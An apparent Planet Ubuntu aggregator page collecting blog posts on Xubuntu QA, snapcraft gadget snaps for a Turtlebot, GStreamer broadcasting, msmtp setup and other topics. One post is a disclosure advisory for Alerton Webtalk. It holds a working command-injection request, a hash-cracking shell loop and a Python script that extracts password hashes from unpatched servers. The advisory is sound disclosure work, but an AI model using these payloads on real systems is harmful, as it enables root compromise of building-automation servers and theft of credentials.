While it is obvious to most that there are deep connections between Xubuntu and Xfce, we hope that this change will bring more targeted testing of the new GTK3 Xfce packages. You will start to see, on the Xubuntu development mailing list, more calls for testing of packages before they reach Xubuntu. Case in point: the recent requests for people to test Thunar and patches direct from the Xfce Git repositories – though up until now these have come via Launchpad bug reports.
On a positive note, this change has only been possible because of the creation of the Xubuntu QA Launchpad team some cycles ago. It was specifically set up to allow people from the community to be brought into the Xubuntu setup and from there become members of the Xubuntu team itself. People do get noticed on the tracker and they do get noticed on our IRC channels. Our hope is that we are able to increase the number of people in Xubuntu QA from the few we currently have. Increasing the number of people involved helps us increase the quality and strength of the team directly.

2 days ago

Ubuntu Insights: ROS production: obtaining confined access to the Turtlebot [4/5] from Planet Ubuntu

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the fourth blog post in this series about ROS production. In the previous post we created a snap of our prototype, and released it into the store. In this post, we’re going to work toward an Ubuntu Core image by creating what’s called a gadget snap. A gadget snap contains information such as the bootloader bits, filesystem layout, etc., and is specific to the piece of hardware running Ubuntu Core. We don’t need anything special in that regard (read that link if you do), but the gadget snap is also currently the only place on Ubuntu Core and snaps in general where we can specify our udev symlink rule in order to obtain confined access to our Turtlebot (i.e. allow our snap to be installable and workable without devmode). Eventually there will be a way to do this without requiring a custom gadget, but this is how it’s done today.
Alright, let’s get started. Remember that this is also a video series: feel free to watch the video version of this post:
Step 1: Start with an existing gadget
Canonical publishes gadget snaps for all reference devices, including generic amd64, i386, as well as the Raspberry Pi 2 and 3, and the DragonBoard 410c. If the computer on which you’re going to install Ubuntu Core is among these, you can start with a fork of the corresponding official gadget snap maintained in the github.com/snapcore organization. Since I’m using a NUC, I’ll start with a fork of pc-amd64-gadget (my finished gadget is available for reference, and here’s one for the DragonBoard). If you’re using a different reference device, fork that gadget and you can still follow the rest of these steps.
Step 2: Select a name for your gadget snap
Open the snapcraft.yaml included in your gadget snap fork. You’ll see the same metadata we discussed in the previous post. Since snap names are globally unique, you need to decide on a different name for your gadget. For example, I selected pc-turtlebot-kyrofa. Once you settle on one, register it:
$ snapcraft register my-gadget-snap-name
If the registration succeeded, change the snapcraft.yaml to reflect the new name. You can also update the summary, description, and version as necessary.
Step 3: Add the required udev rule
If you’ll recall, back in the second post in this series, we installed a udev rule to ensure that the Turtlebot showed up at /dev/kobuki. Take a look at that rule:
$ cat /etc/udev/rules.d/57-kobuki.rules
# On precise, for some reason, USER and GROUP are getting ignored.
# So setting mode = 0666 for now.
SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="kobuki*", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
# Bluetooth module (currently not supported and may have problems)
# SUBSYSTEM=="tty", ATTRS{address}=="00:00:00:41:48:22", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
It’s outside the scope of this series to explain udev in depth, but the two highlighted values (ATTRS{idVendor}=="0403" and ATTRS{idProduct}=="6001") are how the Kobuki base is uniquely identified. We’re going to write the snapd version of this rule, using the same values. At the end of the gadget’s snapcraft.yaml, add the following slot definition:
# Custom serial-port interface for the Turtlebot 2
slots:
  kobuki:
    interface: serial-port
    path: /dev/serial-port-kobuki
    usb-vendor: 0x0403
    usb-product: 0x6001
The name of the slot being defined is kobuki. The symlink path we’re requesting is /dev/serial-port-kobuki. Why not /dev/kobuki? Because snapd only supports namespaced serial port symlinks to avoid conflicts. You can use whatever you like for this path (and the slot name), but make sure to follow the /dev/serial-port-<whatever> pattern, and adjust the rest of the directions in this series accordingly.
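As a quick sanity check (a hypothetical example; the actual tty device behind the symlink will vary), once an image built with this gadget boots with the Kobuki base plugged in, the requested symlink should be present:
$ ls -l /dev/serial-port-kobuki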
Step 4: Build the gadget snap
This step is easy. Just get into the gadget snap directory and run:
$ snapcraft
In the end, you’ll have a gadget snap.
Step 5: Put the gadget snap in the store
You don’t technically need the gadget snap in the store just to create an image, but there are two reasons you will want it there:

Without putting it in the store you have no way of updating it in the future
Without putting it in the store it’s impossible for the serial-port interface we just added to be automatically connected to the snap that needs it, which means the image won’t make the robot move out of the box

Since you’ve already registered the snap name, just push it up (we want our image based on the stable channel, so let’s release into that):
$ snapcraft push /path/to/my/gadget.snap --release=stable
You will in all likelihood receive an error saying it’s been queued for manual review since it’s a gadget snap. It’s true, right now gadget snaps require manual review (although that will change soon). You’ll need to wait for this review to complete successfully before you can take advantage of it actually being in the store (make a post in the store category of the forum if it takes longer than you expect), but you can continue following this series while you wait. I’ll highlight things you’ll need to do differently if your gadget snap isn’t yet available in the store.
Step 6: Adjust our ROS snap to run under strict confinement
As you’ll remember, our ROS snap currently only runs with devmode, and still assumes the Turtlebot is available at /dev/kobuki. We know now that our gadget snap will make the Turtlebot available via a slot at /dev/serial-port-kobuki, so we need to alter our snap slightly to account for this. Fortunately, when we initially created the prototype, we made the serial port configurable. Good call on that! Let’s edit our snapcraft.yaml a bit:
name: my-turtlebot-snap
version: '0.2'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

parts:
  prototype-workspace:
    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

plugs:
  kobuki:
    interface: serial-port

apps:
  system:
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple
Most of this is unchanged from version 0.1 of our snap that we discussed in the previous post; let’s cover the changed sections individually.
version: 0.2
We’re modifying the snap here, so I suggest changing the version. This isn’t required (the version field is only for human consumption, it’s not used to determine which snap is newest), but it certainly makes support easier (“what version of the snap are you on?”).
# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict
You wrote such a nice comment, it hardly needs more explanation. The point is, now that we have a gadget that makes this device accessible, we can switch to using strict confinement.
plugs:
  kobuki:
    interface: serial-port
This one defines a new plug in this snap, but then says “the kobuki plug is just a serial-port plug.” This is optional, but it’s handy to have our plug named kobuki instead of the more generic serial-port. If you opt to leave this off, keep it in mind for the following section.
apps:
  system:
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple
Here we take advantage of the flexibility we introduced in the second post of the series, and specify that our launch file should be launched with device_port set to the udev symlink defined by the gadget instead of the default /dev/kobuki. We also specify that this app should utilize the kobuki plug defined directly above it, which grants it confined access to the serial port.
Rebuild your snap, and release the updated version into the store as we covered in part 3, but now you can release to the stable channel. Note that this isn’t required, but the reasons for putting this snap in the store are the same as the reasons for putting the gadget in the store (namely, updatability and interface auto-connection).
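If your gadget snap hasn’t cleared store review yet (so the serial-port interface won’t be auto-connected), a rough sketch of connecting it manually on the device, assuming the snap and gadget names used in this series:
# Connect the ROS snap's kobuki plug to the gadget's kobuki slot
$ sudo snap connect my-turtlebot-snap:kobuki pc-turtlebot-kyrofa:kobuki
# Verify the connection
$ snap interfaces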
In the next (and final) post in this series, we’ll put all these pieces together and create an Ubuntu Core image that is ready for the factory.

2 days ago

Ubuntu Podcast from the UK LoCo: S10E08 – Rotten Hospitable Statement - Ubuntu Podcast from Planet Ubuntu

We discuss what is going on over at System76 with Emma Marshall, help protect your bits with some Virtual Private Love and go over your feedback.

It’s Season Ten Episode Eight of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.
In this week’s show:

We discuss what we’ve been up to recently:

Martin was interviewed on Destination Linux and also went fossil hunting on the Jurassic Coast.
Alan has been blogging using Nikola.

We discuss What’s going on at System76.

We share a Virtual Private Lurve:

Private Internet Access

And we go over all your amazing feedback – thanks for sending it – please keep sending it!

This week’s cover image is taken from Wikimedia.

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Join us in the Ubuntu Podcast Chatter group on Telegram

2 days ago

David Tomaschik: Security Issues in Alerton Webtalk (Auth Bypass, RCE) from Planet Ubuntu

Introduction

Vulnerabilities were identified in the Alerton Webtalk Software supplied by Alerton. This software is used for the management of building automation systems. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive. Alerton has responded that Webtalk is EOL and past the end of its support period. Customers should move to newer products available from Alerton. Thanks to Alerton for prompt replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

(This blog post is a duplicate of the advisory I sent to the full-disclosure mailing list.)

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users

Severity: High

Password hashes for all of the users configured in Alerton Webtalk are accessible via a file in the document root of the ‘webtalk’ user. The location of this file is configuration dependent, however the configuration file is accessible as well (at a static location, /~webtalk/webtalk.ini). The password database is a sqlite3 database whose name is based on the bacnet rep and job entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the webserver.
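To illustrate how little is required (test-host is the same placeholder host name used in the request shown under Webtalk-02), the configuration file can be fetched without any credentials:
$ curl http://test-host/~webtalk/webtalk.ini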

Webtalk-02 - Command Injection for Authenticated Webtalk Users

Severity: High

Any user granted the “configure webtalk” permission can execute commands as the root user on the underlying server. There appears to be some effort of filtering command strings (such as rejecting commands containing pipes and redirection operators) but this is inadequate. Using this vulnerability, an attacker can add an SSH key to the root user’s authorized_keys file.

GET /~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...

Recommendation: User input should not be passed to shell commands. If this is unavoidable, shell arguments should be properly escaped. Consider using one of the functions from the subprocess module without the shell=True parameter.

Webtalk-03 - Cross-Site Request Forgery

Severity: High

The entire Webtalk administrative interface lacks any controls against Cross-Site Request Forgery. This allows an attacker to execute administrative changes without access to valid credentials. Combined with the above vulnerability, this allows an attacker to gain root access without any credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.

Webtalk-04 - Insecure Credential Hashing

Severity: Moderate

Password hashes in the userprofile.db database are hashed by concatenating the password with the username (e.g., PASSUSER) and performing a plain MD5 hash. No salts or iterative hashing is performed. This does not follow password hashing best practices and makes for highly practical offline attacks.

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.
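To illustrate how practical the offline attack is, here is a rough shell sketch of a dictionary attack against the scheme described above; the username, hash, and wordlist are hypothetical placeholders:

#!/bin/sh
# Brute-force an MD5(password + username) hash as described in Webtalk-04.
USERNAME="admin"                               # hypothetical UserID from tblPassword
TARGET_HASH="replace-with-UserPassword-value"  # hypothetical hash from tblPassword
while IFS= read -r candidate; do
  hash="$(printf '%s%s' "$candidate" "$USERNAME" | md5sum | cut -d' ' -f1)"
  if [ "$hash" = "$TARGET_HASH" ]; then
    echo "Password found: $candidate"
    break
  fi
done < wordlist.txt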

Webtalk-05 - Login Flow Defeats Password Hashing

Severity: Moderate

Password hashing is performed on the client side, allowing for the replay of password hashes from Webtalk-01. While this only works on the mobile login interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting session is able to access all resources and is functionally equivalent to a login through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect secrets in transit.

Timeline

2017/01/?? - Issues Discovered
2017/01/26 - Issues Reported to security () honeywell com
2017/01/30 - Initial response from Alerton confirming receipt.
2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
2017/04/26 - This disclosure

Discovery

These issues were discovered by David Tomaschik of the Google ISA Assessments team.

Appendix A: Script to Extract Hashes

import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os

def get_webtalk_ini(base_url):
    """Get the webtalk.ini file and parse it."""
    url = '%s/~webtalk/webtalk.ini' % base_url
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get webtalk.ini: %s', url)
    buf = StringIO.StringIO(r.text)
    parser = ConfigParser.RawConfigParser()
    parser.readfp(buf)
    return parser

def get_db_path(base_url, config):
    rep = config.get('bacnet', 'rep')
    job = config.get('bacnet', 'job')
    url = '%s/~webtalk/bts/%s/%s/userprofile.db'
    return url % (base_url, rep, job)

def load_db(url):
    """Load and read the db."""
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get %s.' % url)
    tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
    tmpf = os.fdopen(tmpfd, 'w')
    tmpf.write(r.content)
    tmpf.close()
    con = sqlite3.connect(tmpname)
    cur = con.cursor()
    cur.execute("SELECT UserID, UserPassword FROM tblPassword")
    results = cur.fetchall()
    con.close()
    os.unlink(tmpname)
    return results

def users_for_server(base_url):
    if '://' not in base_url:
        base_url = 'http://%s' % base_url
    ini = get_webtalk_ini(base_url)
    db_path = get_db_path(base_url, ini)
    return load_db(db_path)

if __name__ == '__main__':
    for host in sys.argv[1:]:
        try:
            users = users_for_server(host)
        except Exception as ex:
            sys.stderr.write('%s\n' % str(ex))
            continue
        for u in users:
            print '%s:%s' % (u[0], u[1])

2 days ago

Sebastian Dröge: RTP for broadcasting-over-IP use-cases in GStreamer: PTP, RFC7273 for Ravenna, AES67, SMPTE 2022 & SMPTE 2110 from Planet Ubuntu

It’s that time of year again when the broadcast industry gathers at NAB show, which seems like a good time to revisit some frequently asked questions about GStreamer‘s support for various broadcasting-related standards.
Even more so as at this year’s NAB there seems to be a lot of hype about the new SMPTE 2110 standard, which defines how to transport and synchronize live media streams over IP networks, and which fortunately (unlike many other attempts) is based on previously existing open standards like RTP.
While SMPTE 2110 is the new kid on the block here, there are various other standards based on similar technologies. There’s for example AES67 by the Audio Engineering Society for audio-only, Ravenna which is very similar, the slightly older SMPTE 2022 and VSF TR3/4 by the Video Services Forum.
Other standards, like MXF for storage of media (which has been supported by GStreamer for years), are also important in the broadcasting world, but let’s ignore these other use-cases here for now and focus on streaming live media.
Media Transport
All of these standards depend on RTP in one way or another, use PTP or similar services for synchronization, and are either already fully supported by GStreamer (as in the case of AES67/Ravenna) or at least to a large extent, with the missing parts being just some extensions to existing code.
There’s not really much to say here about the actual media transport, as GStreamer has had solid support for RTP for a very long time and has a very flexible and feature-rich RTP stack that includes support for many optional extensions to RTP and is successfully used for broadcasting scenarios, real-time communication (e.g. WebRTC and SIP) and live video streaming as required by security cameras, for example.
Over the last months and years, many new features have been added to GStreamer’s RTP stack for various use-cases and the code was further optimized, and thanks to all that the amount of work needed for new standards based on RTP, like the aforementioned ones, is rather limited. For AES67, for example, no additional work was needed to support it.
The biggest open issue for the broadcasting-related standards currently is the need for further optimization of high-resolution, high-framerate video streaming. In these cases we currently run into performance problems due to the high number of packets per second, and some serious optimizations would be needed. However, there are already various ideas for improving this situation that are just waiting to be implemented.
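As a rough illustration, an AES67-style receiver can be put together from the existing RTP elements using the Python bindings. This is only a sketch, not from the post itself: the port and the caps (plain 48 kHz stereo L24 audio) are assumptions that would need adjusting for a real stream.

import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst, GLib

Gst.init(None)

# Receive 24-bit linear RTP audio (as used by AES67/Ravenna) and play it back.
pipeline = Gst.parse_launch(
    'udpsrc port=5004 caps="application/x-rtp,media=audio,'
    'clock-rate=48000,encoding-name=L24,channels=2" '
    '! rtpjitterbuffer ! rtpL24depay ! audioconvert ! autoaudiosink')
pipeline.set_state(Gst.State.PLAYING)

# Keep the pipeline running.
GLib.MainLoop().run()
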
Synchronization
I already wrote about PTP in GStreamer previously; support for using PTP to synchronize media is merged and has been included since the 1.8 release. In addition to that, NTP is also supported since 1.8.
In theory other clocks could also be used in some scenarios, like clocks based on a GPS receiver, but that’s less common and not yet supported by GStreamer. Nonetheless all the infrastructure for supporting arbitrary clocks exists, so adding these when needed is not going to be much work.
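As a minimal sketch of how the PTP support can be used from the Python bindings (assuming GStreamer 1.8 or newer with the GstNet library available; the PTP domain 0 and the dummy pipeline below are placeholders, not taken from the post), the PTP clock is simply slaved to the network and then used as the pipeline clock:

import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstNet', '1.0')
from gi.repository import Gst, GstNet, GLib

Gst.init(None)

# Initialise the PTP subsystem on all interfaces with an auto-generated clock id.
GstNet.ptp_init(GLib.MAXUINT64, None)

# Create a clock slaved to PTP domain 0 and wait until it has synchronized.
clock = GstNet.PtpClock.new('ptp-clock', 0)
clock.wait_for_sync(Gst.CLOCK_TIME_NONE)

# Use the PTP clock as the pipeline clock instead of the default system clock.
pipeline = Gst.parse_launch('audiotestsrc is-live=true ! autoaudiosink')
pipeline.use_clock(clock)
pipeline.set_state(Gst.State.PLAYING)
GLib.MainLoop().run()
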
Clock Signalling
One major new feature that was added in the last year, for the 1.10 release of GStreamer, was support for RFC7273. While support for PTP in theory allows you to synchronize media properly if both sender and receiver are using the same clock, what was missing before was a way to signal exactly which clock this is and what offsets have to be applied. This is where RFC7273 becomes useful, and why it is used as part of many of the standards mentioned before. It defines a common interface for specifying this information in the SDP, which is commonly used to describe how to set up an RTP session.
The support for that feature was merged for the 1.10 release and is readily available.
Help needed? Found bugs or missing features?
While the basics are all implemented in GStreamer, there are still various missing features for optional extensions of the aforementioned standards or even, in some cases, for required parts of the standards. In addition to that, some optimizations may still be required, depending on your use-case.
If you run into any problems with the existing code, or need further features for the various standards implemented, just drop me a mail.
GStreamer is already used in the broadcasting world in various areas, but let’s together make sure that GStreamer can easily be used as a batteries-included solution for broadcasting use-cases too.

3 days ago

Harald Sitter: KDE neon CMake Package Validation from Planet Ubuntu

In KDE neon’s constant quest of raising the quality bar of KDE software and neon itself, I added a new tool to our set of quality assurance tools. CMake Package QA is meant to ensure that find_package() calls on CMake packages provided by config files (e.g. FooConfig.cmake files) do actually work.
The way this works is fairly simple. For just about every bit of KDE software we have packaged, we install the individual deb packages including dependencies one after the other and run a dummy CMakeLists.txt on any *Config.cmake file in that package.
As an example, we have libkproperty3-dev as a deb package. It contains KPropertyWidgetsConfig.cmake. We install the package and its dependencies, construct a dummy file, and run cmake on it during our cmake linting.
cmake_minimum_required(VERSION 3.0)
find_package(KPropertyWidgets REQUIRED)

This tests that running KPropertyWidgetsConfig.cmake works, ensuring that the cmake code itself is valid (no bad syntax, missing includes, what have you…) and that our package is sound and includes all the dependencies it needs (for example, to satisfy find_dependency macro calls).
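The same check is easy to reproduce outside neon's infrastructure. Here is a minimal sketch of the idea in Python, not the actual neon tooling; the package and CMake names are just the example from above:

import os
import subprocess
import tempfile

DUMMY_CMAKELISTS = """cmake_minimum_required(VERSION 3.0)
find_package(%s REQUIRED)
"""

def check_cmake_package(deb, cmake_package):
    """Install a -dev package (plus dependencies) and verify its CMake config loads."""
    subprocess.check_call(['apt-get', 'install', '-y', deb])
    workdir = tempfile.mkdtemp()
    with open(os.path.join(workdir, 'CMakeLists.txt'), 'w') as f:
        f.write(DUMMY_CMAKELISTS % cmake_package)
    # cmake fails if the *Config.cmake file is broken or a dependency is missing.
    subprocess.check_call(['cmake', '.'], cwd=workdir)

# e.g. (as root): check_cmake_package('libkproperty3-dev', 'KPropertyWidgets')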
As it turns out libkproperty3-dev is of insufficient quality. What a shame.

3 days ago

Joe Barker: Configuring msmtp on Ubuntu 16.04 from Planet Ubuntu

I previously wrote an article about configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post, that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.
I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account.
To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:
# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_USERNAME>
password <PASSWORD>
from <FROM_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (e.g. <PASSWORD>) are things that need replacing with values specific to your configuration. The exception to that is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors to.
Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.
sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large and to keep the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp with the following contents. Note that this is optional: you may choose not to do this, or you may configure the logs differently.
/var/log/msmtp/*.log {
rotate 12
monthly
compress
missingok
notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
to
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following
mail ('personal@email.com', 'Test Subject', 'Test body text');
exit();

Any errors that occur at this point will be displayed in the output, which should make diagnosing any problems after the test relatively easy. If all is successful, you should now be able to use PHP’s sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).
I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong, please let me know and I’ll update it accordingly.

3 days ago

Alan Pope: April Snapcraft Docs Day from Planet Ubuntu

Continuing Snapcraft Docs Days
In March we had our first Snapcraft Docs Day on the last Friday of the month. It was fun and successful, so we're doing it again this Friday, 28th April 2017. Join us in #snapcraft on Rocket Chat and on the snapcraft forums.
Flavour of the month
This month's theme is 'Flavours', specifically Ubuntu Flavours. We've worked hard to make the experience of using snapcraft to build snaps as easy as possible. Part of that work was to ensure it works as expected on all supported Ubuntu flavours. Many of us run stock Ubuntu and, despite our best efforts, may not have caught certain edge cases that are only apparent on flavours.
If you're running an Ubuntu flavour, then we'd love to hear how we did. Do the tutorials we've written work as expected? Is the documentation clear, unambiguous and accurate? Can you successfully create a brand new snap and publish it to the store using snapcraft on your flavour of choice?
Soup of the day
On Friday we'd love to hear about your experiences of doing things like the following on an Ubuntu flavour:-

Ensure snapd is installed via these instructions
Install snapcraft via snap install snapcraft --edge --classic
Follow the Snapcraft Tour
Go through the first Snapcraft Tutorial
Snap a project of your own, by following our build snaps docs
Find other projects to snap (see below)

Happy Hour
On the subject of snapping other people's projects, here are some tips we think you may find useful.

Look for new or interesting open source projects via GitHub's trending projects, such as trending python projects or trending go projects, or perhaps recent Show HN submissions.
Ask in #snapcraft on Rocket Chat whether others have already started on a snap, to avoid duplication and to collaborate.
Avoid snapping frameworks and libraries; focus on more atomic tools, utilities and full applications.
Start small. Perhaps choose command-line or server-based applications, as they're often easier for the beginner than full-fat graphical desktop applications.
Pick applications written in languages you're familiar with. Although not compulsory, it can help when debugging.
Contribute upstream. Once you have a prototype or fully working snap, contribute the yaml to the upstream project, so they can incorporate it in their release process
Consider uploading the application to the store for wider testing, but be prepared to hand the application over to the upstream developer if they request it

Finally, if you're looking for inspiration, join us in #snapcraft on Rocket Chat and ask! We've all got our own pet projects we'd like to see snapped.
Food for thought
Repeated from last time, here's a handy reference of the projects we work on with their repos and bug trackers:-

Project        | Source                | Issue Tracker
Snapd          | Snapd on GitHub       | Snapd bugs on Launchpad
Snapcraft      | Snapcraft on GitHub   | Snapcraft bugs on Launchpad
Snapcraft Docs | Snappy-docs on GitHub | Snappy-docs issues on GitHub
Tutorials      | Tutorials on GitHub   | Tutorials issues on GitHub

3 days ago

Canonical Design Team: Designing in the open from Planet Ubuntu

Over the past year, a change has emerged in the design team here at Canonical: we’ve started designing our websites and apps in public GitHub repositories, and therefore sharing the entire design process with the world.
One of the main things we wanted to improve was the design sign-off process, while also making it clearer to developers which design is the final one among numerous iterations and inconsistently labelled files and folders.
Here is the process we developed and have been using on multiple projects.
The process
Design work items are initiated by creating a GitHub issue on the design repository relating to the project. Each project consists of two repositories: one for the code base and another for designs. The work item issue contains a short descriptive title followed by a detailed description of the problem or feature.

Code block styling from https://github.com/ubuntudesign/vanilla-design/issues/12

Once the designer has created one or more designs to present, they upload them to the issue with a description. Each image is titled with a version number to help reference in subsequent comments.
Whenever the designer updates the GitHub issue everyone who is watching the project receives an email update. It is important for anyone interested or with a stake in the project to watch the design repositories that are relevant to them.
The designer can continue to iterate on the task safe in the knowledge that everyone can see the designs in their own time and provide feedback if needed. The feedback that comes in at this stage is welcomed, as early feedback is usually better than late.
As iterations of the design are created, the designer simply adds them to the existing issue with a comment of the changes they made and any feedback from any review meetings.

Table with actions design from MAAS project

When the design is finalised a pull request is created and linked to the GitHub issue, by adding “Fixes #111” (where #111 is the number of the original issue) to the pull request description. The pull request contains the final design in a folder structure that makes sense for the project.
Just like with code, the pull request is then approved by another designer or the person with the final say. This may seem like an extra step, but it allows another person to look through the issue and make sure the design completes the design goal. On smaller teams, this pull request can be approved by a stakeholder or developer.
Once the pull request is approved it can be merged. This will close and archive the issue and add the final design to the code section of the design repository.
That’s it!
Benefits
If all designers and developers of a project subscribe to the design repository, they will be included in the iterative design process with plenty of email reminders. This increases the visibility of designs in progress to stakeholders, developers and other designers, allowing for wider feedback at all stages of the design process.
Another benefit of this process is having a full history of decisions made and the evolution of a design all contained within a single page.
If your project is open source, this process automatically makes your designs available to your community or anyone interested in the product. This means that anyone who wants to contribute to the project has access to the same information and assets as the team members.
The code section of the design repository becomes the home for all signed off designs. If a developer is ever unsure as to what something should look like, they can reference the relevant folder in the design repository and be confident that it is the latest design.
Canonical is largely a company of remote workers, and sometimes conversations are not documented, which means only some people are aware of the decisions and the discussion behind them. This design process has helped with that issue, as designs and discussions are all kept in a single place, with clearly laid-out emails for every change that anyone may be interested in.
Conclusion
This process has helped our team improve velocity and transparency. Is this something you’ve considered or have done in your own projects? Let us know in the comments, we’d love to hear of any way we can improve the process.

4 days ago

Daniel Pocock: FSFE Fellowship Representative, OSCAL'17 and other upcoming events from Planet Ubuntu

The Free Software Foundation of Europe has just completed the process of electing a new fellowship representative to the General Assembly (GA) and I was surprised to find that out of seven very deserving candidates, members of the fellowship have selected me to represent them on the GA.
I'd like to thank all those who voted, the other candidates and Erik Albers for his efforts to administer this annual process.
Please consider becoming an FSFE fellow or donor
The FSFE runs on the support of both volunteers and financial donors, including organizations and individual members of the fellowship program. The fellowship program is not about money alone; it is an opportunity to become more aware of, and involved in, the debate about technology's impact on society, for better or worse. Developers, users and any other supporters of the organization's mission are welcome to join; here is the form. You don't need to be a fellow or pay any money to be an active part of the free software community, and FSFE events generally don't exclude non-members; nonetheless, becoming a fellow gives you a stronger voice in processes such as this annual election.
Attending OSCAL'17, Tirana
During the election period, I promised to keep on doing the things I already do: volunteering, public speaking, mentoring, blogging and developing innovative new code. During May I hope to attend several events, including OSCAL'17 in Tirana, Albania on 13-14 May. I'll be running a workshop there on the Debian Hams blend and Software Defined Radio. Please come along and encourage other people you know in the region to consider attending.

What is your view on the Fellowship and FSFE structure?
Several candidates made comments about the Fellowship program and the way individual members and volunteers are involved in FSFE governance. This is not a new topic. Debate about this topic is very welcome and I would be particularly interested to hear any concerns or ideas for improvement that people may contribute. One of the best places to share these ideas would be through the FSFE's discussion list.
In any case, the fellowship representative cannot single-handedly overhaul the organization. I hope to be a constructive part of the team, and that whenever my term comes to an end, the organization and the free software community in general will be stronger and happier in some way.

4 days ago